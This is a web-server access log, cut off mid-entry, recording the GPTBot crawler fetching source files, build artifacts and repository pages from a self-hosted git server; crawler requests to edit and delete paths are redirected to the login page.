"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx" -[17/Feb/2026:16:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15568] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:16:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/About.tsx" -[17/Feb/2026:16:42:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16522] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx" -[17/Feb/2026:16:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14837] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx" -[17/Feb/2026:16:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16492] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx" -[17/Feb/2026:16:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15598] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:16:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14867] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx" -[17/Feb/2026:16:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Hero.tsx" -[17/Feb/2026:16:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9922] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:16:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md?display=source" [Client 74.7.227.38] [Length 15613] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md" -[17/Feb/2026:16:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/projects?q=&sort=oldest&state=open" [Client 74.7.227.38] [Length 7800] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/projects" -[17/Feb/2026:16:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 11419] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" -[17/Feb/2026:16:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=source" [Client 74.7.227.38] [Length 15785] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:16:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=rendered" [Client 74.7.227.38] [Length 11102] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:16:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12804] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx" -[17/Feb/2026:16:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts?display=source" [Client 74.7.227.38] [Length 11542] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts" -[17/Feb/2026:16:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx" -[17/Feb/2026:16:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts" -[17/Feb/2026:16:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx" -[17/Feb/2026:16:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9921] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:16:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11517] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore" -[17/Feb/2026:16:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts" -[17/Feb/2026:16:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:16:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 10477] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:16:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:16:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts?display=source" [Client 74.7.227.38] [Length 11543] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts" -[17/Feb/2026:16:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11982] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts" -[17/Feb/2026:16:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11519] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore" -[17/Feb/2026:16:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12805] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx" -[17/Feb/2026:16:42:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/services/geminiService.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services/geminiService.ts" -[17/Feb/2026:16:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/services/geminiService.ts" -[17/Feb/2026:16:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" [Client 74.7.227.38] [Length 11340] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal" -[17/Feb/2026:16:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15108] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 9816] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore" -[17/Feb/2026:16:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static" [Client 74.7.227.38] [Length 10888] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" -[17/Feb/2026:16:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/app" [Client 74.7.227.38] [Length 10246] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app" -[17/Feb/2026:16:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:16:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 211237] [Gzip 18.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:16:42:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf?display=source" [Client 74.7.227.38] [Length 11893] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf" -[17/Feb/2026:16:42:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 48497] [Gzip 12.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:16:42:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 28729] [Gzip 9.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:16:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 97595] [Gzip 18.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:16:43:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties" [Client 74.7.227.38] [Length 10392] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" -[17/Feb/2026:16:43:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" -[17/Feb/2026:16:43:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService" -[17/Feb/2026:16:43:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:43:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 10216] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static" -[17/Feb/2026:16:43:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/static" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static" -[17/Feb/2026:16:43:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/static" -[17/Feb/2026:16:43:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/static" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static" -[17/Feb/2026:16:43:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/static" -[17/Feb/2026:16:43:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:16:43:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:16:43:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:16:43:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:16:43:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:43:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 